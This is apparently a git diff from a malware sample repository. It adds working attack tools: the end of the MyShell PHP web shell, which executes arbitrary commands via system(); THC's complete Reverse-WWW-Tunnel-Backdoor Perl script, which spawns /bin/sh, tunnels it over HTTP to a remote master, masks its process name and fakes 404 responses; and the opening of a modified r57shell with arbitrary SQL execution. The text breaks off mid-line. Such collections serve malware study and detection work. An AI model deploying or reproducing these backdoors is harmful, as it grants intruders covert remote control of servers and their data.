"bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>> +<form name="shell" method="post"> +Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a> +<input type="hidden" name=whoami value=<?echo $whoami?>> +&nbsp;&nbsp;:::::::&nbsp;&nbsp; +<? +if($editMode){ + echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n"; +} +else{ + echo "Current working directory: <b>\n"; + $work_dir_splitted = explode("/", substr($work_dir, 1)); + echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/"; + if ($work_dir_splitted[0] == "") { + $work_dir = "/"; /* Root directory. */ + } + else{ + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $url .= "/".$work_dir_splitted[$i]; + echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>"; + } + } +} +?> +<br> +<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> > +<? +echo $shellOutput; +if ($command) { + if ($stderr) { + system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); + } + else { + $ok = system($command,$status); + if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); + } +} +if ($commandBk) $command = $commandBk; +?> +</textarea> +<br> +<? +if($editMode) echo" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; + <input type='submit' name='editSave' value=' Save '>&nbsp;&nbsp;&nbsp; + <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp; + <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp; + <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp; + <input type='hidden' name='editMode' value='true'> +<br>"; +?> +<br> +Command: +<input type="text" name="command" size="80" +<? if ($command && $echoCommand) { + echo "value=`$command`"; + } +?> > <input name="submit_btn" type="submit" value="Go!"> +&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; +<? +if ($autoErrorTrap) echo "Auto error traping enabled"; +else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping "; + +if($editMode){ + echo "<input type='hidden' name='work_dir' value='$work_dir'> + <br>Save file as: <input type='text' name='file' value='$currFile'>"; +} +else{ + echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">"; + // List of directories. + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == ".") + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + elseif ($dir == "..") { + // Parent Dir. This might be server's root directory + if (strlen($work_dir) == 1) { + // work_dir is only 1 charecter - it can only be / so don't output anything + } + elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc... + echo "<option value=\"/\">Parent Directory</option>\n"; + } + else { // String-manipulation to find the parent directory... Trust me - it works :-) + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } + else { + if ($work_dir == "/") + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + else + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + closedir($dir_handle); + echo "</select>"; +} +?> +&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands +&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>> +&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>> +&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a> +</form> +</body> +</html> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.ReverseTunnel.20 b/PHP/Backdoor.PHP.ReverseTunnel.20 new file mode 100644 index 00000000..294dedc8 --- /dev/null +++ b/PHP/Backdoor.PHP.ReverseTunnel.20 @@ -0,0 +1,368 @@ +#!/usr/bin/perl +# +# Reverse-WWW-Tunnel-Backdoor v2.0 +# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be> +# Check out http://www.thehackerschoice.com +# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls" +# available at the website above in the "Articles" section. +# + +# Greets to all THC, TESO, ADM and #bluebox guys + +# verified to work on Linux, Solaris, AIX and OpenBSD + +# BUGS: some Solaris machines: select(3) is broken, won't work there +# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ... +# we can't make proper receive checks here. Workaround implemented. +# +# HISTORY: +# v2.0: HTTP 1.0 protocol compliance (finally ;-) +# v1.6: included www-proxy authentication ;-)) +# v1.4: porting to various unix types (and I thought perl'd be portable...) +# v1.3: initial public release of the paper including this tool + +# +# GENERAL CONFIG (except for $MASK, everything must be the same +# for MASTER and SLAVE is this section!) +# +$MODE="POST"; # GET or POST +$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi. +$MASK="vi"; # for masking the program's process name +$PASSWORD="THC"; # anything, nothing you have to rememeber + # (not a real "password" anyway) +# +# MASTER CONFIG (specific for the MASTER) +# +$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) +$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!) + +# +# SLAVE CONFIG (specific for the SLAVE) +# +$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) +$DELAY="3"; # time to wait for output after your command(s) +#$TIME="14:39"; # time when to connect to the master (unset if now) +#$DAILY="yes"; # tries to connect once daily if set with something +#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one +#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one +#$PROXY_USER="user"; # username for proxy authentication +#$PROXY_PASSWORD="pass";# password for proxy authentication +#$DEBUG="yes"; # for debugging purpose, turn off when in production +$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris + +# END OF CONFIG # nothing for you to do after this point # + +################## BEGIN MAIN CODE ################## + +require 5.002; +use Socket; + +$|=1; # next line changes our process name +if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } +undef $DAILY if (! $TIME); +if ( !($PROXY) || !($PROXY_PORT) ) { + undef $PROXY; + undef $PROXY_PORT; +} +$protocol = getprotobyname('tcp'); + +if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") { + print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n"; + print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n"; + exit(0); +} + +if ($ARGV[0] eq "slave") { + print STDOUT "starting in slave mode\n"; + $SLAVE_MODE = "yeah"; +} + +# check for a correct mode +if ($MODE ne "GET" && $MODE ne "POST") { + print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n"; + exit(-1); +} + +if (! $SLAVE_MODE) { + &master; +} else { + &slave; +} +# END OF MAIN FUNCTION + +############### SLAVE FUNCTION ############### + +sub slave { + $pid = 0; + $PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n"; + if ($PROXY) { # setting the real config (for Proxy Support) + $REAL_SERVER = $PROXY; + $REAL_PORT = $PROXY_PORT; + $REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT + . $CGI_PREFIX; + $PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n"; + if ( $PROXY_USER && USER_PASSWORD ) { + &base64encoding; + $PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE; + } + } else { + $REAL_SERVER = $SERVER; + $REAL_PORT = $LISTEN_PORT; + $REAL_PREFIX = $MODE . " " . $CGI_PREFIX; + } + $REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET"); + $REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST"); +AGAIN: if ($pid) { kill 9, $pid; } + if ($TIME) { # wait until the specified $TIME + $TIME =~ s/^0//; $TIME =~ s/:0/:/; + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" . $min; + while ($TIME ne $t) { + sleep(28); # every 28 seconds we look at the watch + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" .$min; + } + } + print STDERR "Slave activated\n" if $DEBUG; + if ($DAILY) { # if we must connect daily, we'll + if (fork) { # fork the daily shell process to + sleep(69); # ensure the master control process + goto AGAIN; # won't get stuck by a fucking cmd + } # the user executed. + print STDERR "forked\n" if $DEBUG; + } + $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; + $remote = sockaddr_in($REAL_PORT, $address); + $forked = 0; +GO: close(THC); + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + if (! $forked) { # fork failed? fuck, let's try again + pipe R_IN, W_IN; select W_IN; $|=1; + pipe R_OUT, W_OUT; select W_OUT; $|=1; + $pid = fork; + if (! defined $pid) { + close THC; + close R_IN; close W_IN; + close R_OUT; close W_OUT; + goto GO; + } + $forked = 1; + } + if (! $pid) { # this is the child process (execs $SHELL) + close R_OUT; close W_IN; close THC; + print STDERR "forking $SHELL in child\n" if $DEBUG; + open STDIN, "<&R_IN"; + open STDOUT, ">&W_OUT"; + open STDERR, ">&W_OUT"; + exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; + close R_IN; close W_OUT; + exit(0); + } else { # this is the parent (data control + network) + close R_IN; + sleep($DELAY); # we wait $DELAY for the commands to complete + vec($rs, fileno(R_OUT), 1) = 1; + print STDERR "before: allwritten2stdin\n" if $DEBUG; + select($r = $rs, undef, undef, 30); + print STDERR "after : wait for allwritten2stdin\n" if $DEBUG; + sleep(1); # The following readin of the command output + $output = ""; # looks weird. It must be! every system + vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-(( + print STDERR "before: readwhiledatafromstdout\n" if $DEBUG; + while (select($w = $ws, undef, undef, 1)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : readwhiledatafromstdout\n" if $DEBUG; + print STDERR "before: fucksunprob\n" if $DEBUG; + vec($ws, fileno(W_OUT), 1) = 1; + while (! select(undef, $w=$ws, undef, 0.001)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : fucksunprob\n" if $DEBUG; + print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG; + print W_OUT "\000" || goto END_IT; + print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG; + while (1) { + read R_OUT, $readout, 1 || last; + last if ($readout eq "\000"); + $output = $output . $readout; + } + print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG; + &uuencode; # does the encoding of the shell output + if ($MODE eq "GET") { + $encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n"; + $encoded = $encoded . $PROXY_SUFFIX; + $encoded = $encoded . "\r\n"; + } else { # $MODE is "POST" + $encoded = $REAL_PREFIX . $PROXY_SUFFIX + . "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + . $encoded . "\r\n"; + } + print STDERR "connecting to remote, fail->exit\n" if $DEBUG; + connect(THC, $remote) || goto END_IT; # connect to master + print STDERR "send encoded data, fail->exit\n" if $DEBUG; + send (THC, $encoded, 0) || goto END_IT; # and send data + $input = ""; + vec($rt, fileno(THC), 1) = 1; # wait until master sends reply + print STDERR "before: wait4answerfromremote\n" if $DEBUG; + while (! select($r = $rt, undef, undef, 0.00001)) {} + print STDERR "after : wait4answerfromremote\n" if $DEBUG; + print STDERR "read data from socket until eod\n" if $DEBUG; + $error="no"; +# while (1) { # read until EOD (End Of Data) + print STDERR "?" if $DEBUG; + # OpenBSD 2.2 can't recv here! can't get any data! sucks ... + recv (THC, $readin, 16386, 0) || undef $error; +# if ((! $error) and (! $BROKEN_RECV)) { goto OK; } + print STDERR "!" if $DEBUG; + goto OK if (($readin eq "\000") or ($readin eq "\n") + or ($readin eq "")); + $input = $input . $readin; +# } +OK: print STDERR "\nall data read, entering OK\n" if $DEBUG; + print STDERR "RECEIVE: $input\n" if $DEBUG; + $input =~ s/.*\r\n\r\n//s; + print STDERR "BEFORE DECODING: $input\n" if $DEBUG; + &uudecode; # decoding the data from the master + print STDERR "AFTER DECODING: $decoded\n" if $DEBUG; + print STDERR "if password not found -> exit\n" if $DEBUG; + goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0); + $decoded =~ s/^$PASSWORD//; + print STDERR "writing input data to $SHELL\n" if $DEBUG; + print W_IN "$decoded" || goto END_IT; # sending the data + sleep(1); # to the shell proc. + print STDERR "jumping to GO\n" if $DEBUG; + goto GO; + } +END_IT: kill 9, $pid; $pid = 0; + exit(0); +} # END OF SLAVE FUNCTION + +############### MASTER FUNCTION ############### + +sub master { + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; + listen(THC, 3) || die "can't listen\n"; # print the HELP + print STDOUT ' +Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ... + +Introduction: Wait for your SLAVE to connect, examine it\'s output and then + type in your commands to execute on SLAVE. You\'ll have to + wait min. the set $DELAY seconds before you get the output + and can execute the next stuff. Use ";" for multiple commands. + Trying to execute interactive commands may give you headache + so beware. Your SLAVE may hang until the daily connect try + (if set - otherwise you lost). + You also shouldn\'t try to view binary data too ;-) + "echo bla >> file", "cat >> file <<- EOF", sed etc. are your + friends if you don\'t like using vi in a delayed line mode ;-) + To exit this program on any time without doing harm to either + MASTER or SLAVE just press Control-C. + Now have fun. +'; + +YOP: print STDOUT "\nWaiting for connect ..."; + $remote=accept (S, THC) || goto YOP; # get the connection + ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE + $slave=gethostbyaddr($r_slave, AF_INET); # data. + $slave="unresolved" if ($slave eq ""); + print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; + select S; $|=1; + select STDOUT; $|=1; + $input = ""; + vec($socks, fileno(S), 1) = 1; + $error="no"; +# while (1) { # read the data sent by the slave + while (! select($r = $socks, undef, undef, 0.00001)) {} + recv (S, $readin, 16386, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { + print STDOUT "[disconnected]\n"; + } +# $readin =~ s/\r//g; +# $input = $input . $readin; +# last if ( $input =~ m/\r\n\r\n/s ); + $input = $readin; + print STDERR "MASTER RECEIVE: $input\n" if $DEBUG; +# } + &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); + if ( $input =~ m/^GET /s ) { + $input =~ s/^.*($CGI_PREFIX)\??//s; + $input =~ s/\r\n.*$//s; + } else { if ( $input =~ m/^POST /s ) { + $input =~ s/^.*\r\n\r\n//s; + } else { if ( $input =~ m/^HEAD /s ) { + &hide_as_broken_webserver; + } else { + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; + } } } + print STDERR "BEFORE DECODING: $input\n" if $DEBUG; + &uudecode; # decoding the data from the slave + &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); + $decoded =~ s/^$PASSWORD//s; + $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); + print STDOUT "$decoded"; # showing the slave output to the user + $output = <STDIN>; # and get his input. + &uuencode; # encode the data for the slave + $encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n"; + send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it + close (S); + print STDOUT "sent.\n"; + goto YOP; # wait for the next connect from the slave +} # END OF MASTER FUNCTION + +###################### MISC. FUNCTIONS ##################### + +sub uuencode { # does the encoding stuff for error-free data transfer via WWW + $output = $PASSWORD . $output; # PW is for error checking and + $uuencoded = pack "u", "$output"; # preventing sysadmins from + $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird + /'zcadefghjklmnopqrstuv' # data. No real + /; # security! + $uuencoded =~ tr/"'"/'b'/; + if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb + $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; + $cut_length = 4099 - (length $REAL_PREFIX); + $uuencoded = pack "a$cut_length", $uuencoded + if ($codelength > 4111); + } + $encoded = $uuencoded; +} # END OF UUENCODE FUNCTION + +sub uudecode { # does the decoding of the data stream + $input =~ tr/'zcadefghjklmnopqrstuv' + /'\n)=(:;&><,#$*%]!\@"`\\\-' + /; + $input =~ tr/'b'/"'"/; + $decoded = unpack "u", "$input"; +} # END OF UUDECODE FUNCTION + +sub base64encoding { # does the base64 encoding for proxy passwords + $encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD; + $encoded_string = substr(pack('u', $encode_string), 1); + chomp($encoded_string); + $encoded_string =~ tr|` -_|AA-Za-z0-9+/|; + $padding = (3 - length($encode_string) % 3) % 3; + $encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding; + $PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n"; +} # END OF BASE64ENCODING FUNCTION + +sub hide_as_broken_webserver { # invalid request -> look like broken server + send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>". + "<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0); + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; +} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION + +# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be> + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.ai b/PHP/Backdoor.PHP.Rst.ai new file mode 100644 index 00000000..ee378078 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.ai @@ -0,0 +1,1917 @@ +<?phpr57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.23 +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +//di modif ama pluto +//di modif lagi ama iFX + + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = " ~Alissa~"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ ?????????????? ~~~ */ + +// $auth = 1; - ?????????????? ???????? +// $auth = 0; - ?????????????? ????????? +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! +$name=''; // ????? ???????????? +$pass=''; // ?????? ???????????? + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="Modified By iFX"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://lintah-club.ueuo.com>HELLW access denied tau'!!!, soryy neeh cuy!! :D</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>:: The r57 shell with modified by iFX :: listening L\'Arc~en~Ciel - MilkyWay::</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +body,td,th { +color: #00FF00; +} +tr { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #97C296 1px solid; +BORDER-LEFT: #97C296 1px solid; +BORDER-BOTTOM: #000E6A 1px solid; +} +td { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #97C296 1px solid; +BORDER-LEFT: #97C296 1px solid; +BORDER-BOTTOM: #000000 1px solid; +} +.table1 { +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #97C296 0px; +BORDER-LEFT: #97C296 0px; +BORDER-BOTTOM: #333333 0px; +BACKGROUND-COLOR: #000000; +} +.td1 { +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #97C296 0px; +BORDER-LEFT: #97C296 0px; +BORDER-BOTTOM: #333333 0px; +font: 7pt Verdana; +} +.tr1 { + +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #333333 0px; +BORDER-LEFT: #333333 0px; +BORDER-BOTTOM: #333333 0px; +} +table { +BORDER-RIGHT: #97C296 1px outset; +BORDER-TOP: #97C296 1px outset; +BORDER-LEFT: #97C296 1px outset; +BORDER-BOTTOM: #97C296 1px outset; +BACKGROUND-COLOR: #004F0A; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: 8pt Verdana; +color : #FFFFFF; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: 8pt Verdana; +color:#80DBEE +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #004F0A; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: Fixedsys bold; +color:#E49F1F; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +background-color: #000000; +} + +A:link {COLOR: #97C296; TEXT-DECORATION: none} +A:visited { COLOR: #2BE421; TEXT-DECORATION: none} +A:active {COLOR: #000099; TEXT-DECORATION: none} +A:hover {color: #2FADD7; TEXT-DECORATION: underline} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : 